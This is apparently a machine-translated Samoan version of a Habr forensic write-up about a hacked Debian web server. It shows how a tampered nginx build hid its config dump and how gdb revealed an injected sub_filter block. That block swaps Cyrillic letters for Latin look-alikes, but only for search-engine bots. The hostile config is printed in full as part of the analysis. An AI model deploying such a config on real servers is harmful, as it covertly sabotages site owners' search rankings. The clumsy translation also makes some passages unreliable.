O se tala sili ona le fiafia na tupu i se tasi o au uo. Ae e ui ina le fiafia e pei ona iʻu i ai mo Mikhail, e pei lava o le faafiafiaina mo aʻu.
E tatau ona ou fai atu o la'u uo e lelei UNIX-tagata faʻaoga: mafai ona faʻapipiʻi le faiga lava ia mysql, php ma fai ni faatulagaga faigofie nginx.
Ma o loʻo ia te ia le taseni poʻo le tasi ma le afa 'upega tafaʻilagi faʻapitoa mo meafaigaluega faufale.
O se tasi o nei 'upega tafaʻilagi faʻapitoa i chainsaws o loʻo nofo mau i le TOP o masini suʻesuʻe. O lenei 'upega tafaʻilagi e le o se suʻesuʻega faʻapisinisi, ae o se tasi na masani ona osofaʻia. lena DDoS, ona fa'amalosi lea, ona latou tusia lea o fa'amatalaga mataga ma lafo fa'asua'i i le talimalo ma le RKN.
Na faʻafuaseʻi, na faʻafilemu mea uma ma o lenei toʻafilemu na iu ina le lelei, ma na amata ona alu ese le saite i laina pito i luga o taunuuga o sailiga.
O se faaupuga lena, ona fai lea o le tala a le admin lava ia.
Ua latalata i le taimi e momoe ai ae tatagi le telefoni: “San, e te le tilotilo i laʻu server? E foliga mai ia te aʻu na osofaia aʻu, e le mafai ona ou faʻamaonia, ae o le lagona e leʻi tuua aʻu mo le vaiaso lona tolu. Masalo ua naʻo le taimi ou te faia ai se togafitiga mo le paranoia?"
O le mea na sosoo ai o se talanoaga e afa itula lea e mafai ona aoteleina e faapea:
- o le palapala mo le hacking sa fai si lafulemu;
- e mafai e se tagata osofa'i ona maua aia tatau e sili atu i tagata fa'aoga;
- o le osofaʻiga (pe a fai na tupu) na faʻatatau tonu i lenei nofoaga;
- o vaega faʻafitauli ua faʻasaʻo ma e tatau ona e malamalama pe na i ai se faʻalavelave;
- e le mafai e le hack ona aafia ai le code site ma databases.
E tusa ai ma le vaega mulimuli.
Na'o le pa'epa'e pito i luma IP o lo'o va'ai atu i le lalolagi. E leai se felafolafoaiga i le va o pito i tua ma le pito i luma sei vagana ai le http(s), e eseese tagata faʻaoga / password, leai se ki na fesuiaʻi. I tuatusi efuefu, ua tapunia uma uafu se'i vagana le 80/443. O IP papaʻe papaʻe e iloa e naʻo le toʻalua tagata faʻaoga, lea e faʻatuatuaina atoatoa e Mikhail.
Fa'apipi'i i le pito i luma Debian 9 ma e oo atu i le taimi e faia ai le valaau, ua vavae ese le faiga mai le lalolagi e se pa puipui i fafo ma taofi.
“Ua lelei, tuu mai ia te au se avanoa,” ou te filifili e tuu le moe mo se itula. "O le a ou vaai i oʻu lava mata."
O iinei ma isi:
$ grep -F PRETTY_NAME /etc/*releas*
PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
$ `echo $SHELL` --version
GNU bash, version 4.4.12(1)-release (x86_64-pc-linux-gnu)
$ nginx -v
nginx version: nginx/1.10.3
$ gdb --version
GNU gdb (Debian 8.2.1-2) 8.2.1
Su'e mo se hack e mafai
Ou te amataina le server, muamua i totonu faiga laveai. Ou te faapipiiina tisiki ma susue i totonu pule-ogalaau, talafaasolopito, logs system, ma isi mea, pe a mafai, ou te siakiina aso o le failaina o faila, e ui lava ou te malamalama o se masi masani o le a "salu" pe a uma ia te ia lava, ma ua uma ona "solia" Misha i le tele o taimi ao ia sailia mo ia lava. .
Ou te amata i le tulaga masani, e leʻi malamalama lelei i le mea e suʻe, ou te suʻesuʻeina le configs. Muamua, ou te fiafia i ai nginx talu ai, i se tulaga lautele, e leai se isi mea i le pito i luma vagana ai.
O configs e laiti, lelei le faʻatulagaina i totonu o le sefulu faila, ou te tilotilo i ai pusi'oi taitoatasi. E foliga mai e mama mea uma, ae e te le iloa pe na ou misia se mea aofia, se'i ou faia se lisi atoa:
$ nginx -T
nginx: the configuration file /usr/local/etc/nginx/nginx.conf syntax is ok
nginx: configuration file /usr/local/etc/nginx/nginx.conf test is successful
Ou te leʻi malamalama: "O fea le lisi?"
$ nginx -V
nginx version: nginx/1.10.3
TLS SNI support enabled
configure arguments: --with-cc-opt='-g -O2' --with-ld-opt='-Wl,-z,relro -Wl,-z,now' --prefix=/usr/share/nginx --conf-path=/etc/nginx/nginx.conf --http-log-path=/var/log/nginx/access.log --error-log-path=/var/log/nginx/error.log --lock-path=/var/lock/nginx.lock --pid-path=/run/nginx.pid --modules-path=/usr/lib/nginx/modules --http-client-body-temp-path=/var/lib/nginx/body --http-fastcgi-temp-path=/var/lib/nginx/fastcgi --http-proxy-temp-path=/var/lib/nginx/proxy --http-scgi-temp-path=/var/lib/nginx/scgi --http-uwsgi-temp-path=/var/lib/nginx/uwsgi --with-debug --with-pcre-jit --with-ipv6 --with-http_ssl_module --with-http_stub_status_module --with-http_realip_module --with-http_auth_request_module --with-http_v2_module --with-http_dav_module --with-http_slice_module --with-threads --with-http_addition_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_sub_module --with-stream=dynamic --with-stream_ssl_module --with-mail=dynamic --with-mail_ssl_module
O le fesili lona lua e faaopoopo i le lisi fesili: "Aisea o se ituaiga anamua o nginx?"
E le gata i lea, e talitonu le polokalama o loʻo faʻapipiʻiina le lomiga fou:
$ dpkg -l nginx | grep "[n]ginx"
ii nginx 1.14.2-2+deb10u1 all small, powerful, scalable web/proxy server
Ou te valaau:
- Misha, aisea na e toe faʻapotopoto ai nginx?
- Ala mai, ou te le iloa pe faapefea ona fai lenei mea!
- Ua lelei, alu e moe ...
Nginx o loʻo manino le toe fausia ma o le gaioiga o le lisi e faʻaaoga ai le "-T" o loʻo natia mo se mafuaʻaga. E le toe i ai ni masalosaloga e uiga i le hacking ma e mafai ona e talia ma (talu ai ua suia e Misha le server i se mea fou) mafaufau i le faafitauli ua foia.
Ma e moni lava, talu ai na maua e se tasi le aia tatau aʻa'ae, o lona uiga na'o se mea e fai toe fa'apipi'i faiga, ma sa leai se aoga o le suʻeina po o le a le mea na tupu iina, ae o le taimi lea na faatoilaloina ai e le fia iloa le moe. E mafai faapefea ona tatou iloa mea na latou mananao e natia mai ia i tatou?
Tatou taumafai e su'e:
$ strace nginx -T
Matou te tilotilo i ai, e manino lava e le lava laina i le trace a la
write(1, "/etc/nginx/nginx.conf", 21/etc/nginx/nginx.conf) = 21
write(1, "...
write(1, "n", 1
Naʻo le malie, seʻi o tatou faʻatusatusa mea na maua.
$ strace nginx -T 2>&1 | wc -l
264
$ strace nginx -t 2>&1 | wc -l
264
Ou te manatu o se vaega o le code /src/core/nginx.c
case 't':
ngx_test_config = 1;
break;
case 'T':
ngx_test_config = 1;
ngx_dump_config = 1;
break;
na aumai i le fomu:
case 't':
ngx_test_config = 1;
break;
case 'T':
ngx_test_config = 1;
//ngx_dump_config = 1;
break;
poʻo
case 't':
ngx_test_config = 1;
break;
case 'T':
ngx_test_config = 1;
ngx_dump_config = 0;
break;
o le mea lea e le faʻaalia ai le lisi e le "-T".
Ae faʻafefea ona tatou vaʻai i la tatou config?
Afai e saʻo loʻu manatu ma o le faʻafitauli e naʻo le fesuiaiga ngx_dump_config tatou taumafai e faʻapipiʻi faʻaaoga gdb, laki e iai se ki --with-cc-opt -g o loʻo iai ma faʻamoemoe o le faʻaleleia atili -O2 e le afaina ai i tatou. I le taimi lava e tasi, talu ai ou te le iloa pe faapefea ngx_dump_config e mafai ona fa'agaioia i totonu mataupu 'T':, matou te le taʻua lenei poloka, ae faʻapipiʻi faʻaaoga mataupu 't':
Aisea e mafai ai ona e faʻaogaina le '-t' faʻapea foʻi ma le '-T'Fa'atonuga poloka afai(ngx_dump_config) tupu i totonu afai(ngx_test_config):
if (ngx_test_config) {
if (!ngx_quiet_mode) {
ngx_log_stderr(0, "configuration file %s test is successful",
cycle->conf_file.data);
}
if (ngx_dump_config) {
cd = cycle->config_dump.elts;
for (i = 0; i < cycle->config_dump.nelts; i++) {
ngx_write_stdout("# configuration file ");
(void) ngx_write_fd(ngx_stdout, cd[i].name.data,
cd[i].name.len);
ngx_write_stdout(":" NGX_LINEFEED);
b = cd[i].buffer;
(void) ngx_write_fd(ngx_stdout, b->pos, b->last - b->pos);
ngx_write_stdout(NGX_LINEFEED);
}
}
return 0;
}
Ioe, pe a suia le code i lenei vaega ae le o totonu mataupu 'T':, ona le aoga laʻu metotia.
Su'ega nginx.confUa uma ona foia le faʻafitauli faʻataʻitaʻiga, na faʻamautu ai e manaʻomia se faʻatonuga maualalo mo le malware e galue nginx ituaiga:
events {
}
http {
include /etc/nginx/sites-enabled/*;
}
O le a matou faʻaaogaina mo le faʻapuupuuga i le tusiga.
Tatala le debugger
$ gdb --silent --args nginx -t
Reading symbols from nginx...done.
(gdb) break main
Breakpoint 1 at 0x1f390: file src/core/nginx.c, line 188.
(gdb) run
Starting program: nginx -t
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Breakpoint 1, main (argc=2, argv=0x7fffffffebc8) at src/core/nginx.c:188
188 src/core/nginx.c: No such file or directory.
(gdb) print ngx_dump_config=1
$1 = 1
(gdb) continue
Continuing.
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful
# configuration file /etc/nginx/nginx.conf:
events {
}
http {
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}
map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}
map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}
map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}
sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;
include /etc/nginx/sites-enabled/*;
}
# configuration file /etc/nginx/sites-enabled/default:
[Inferior 1 (process 32581) exited normally]
(gdb) quit
Laasaga i lea laasaga:
- seti se vaeluaga i le galuega autu ()
- tatala le polokalame
- suia le tau o le fesuiaiga e fuafua ai le gaosiga o le config ngx_dump_config=1
- faaauau/faai'u le polokalame
E pei ona mafai ona tatou vaʻavaʻai, o le mea moni e ese mai ia i tatou, matou te filifilia se fasi parasitic mai ai:
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}
map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}
map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}
map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}
sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;
Se'i o tatou va'ava'ai i mea o lo'o tupu iinei i le fa'asologa.
Faamoemoe Tagata e faʻaoga-sooupu's yandex/google:
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}
E le aofia ai itulau o auaunaga wordpress:
map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}
Ma mo i latou e pau i lalo o tulaga uma e lua i luga
map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}
map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}
i le tusitusiga HTML-suia itulau 'O' i 'o' и 'A' i 'a':
sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;
E sa'o, na'o le fa'a'ole'ole o lena 'a' != 'a' pei lava 'o' != 'o':
O le mea lea, e maua ai e bots afi su'esu'e, nai lo le masani 100% Cyrillic tusitusiga, lapisi fa'aleleia ua fa'afefe i le Latina. 'a' и 'o'. Ou te le faʻamalosi e talanoaina pe faʻafefea ona aʻafia lenei SEO, ae e foliga mai e le o sea faʻalavelave mataʻitusi o le a i ai se aafiaga lelei i tulaga i taunuuga o sailiga.
O le a se mea e mafai ona ou fai atu ai, tama ma mafaufauga.
mau
puna: www.habr.com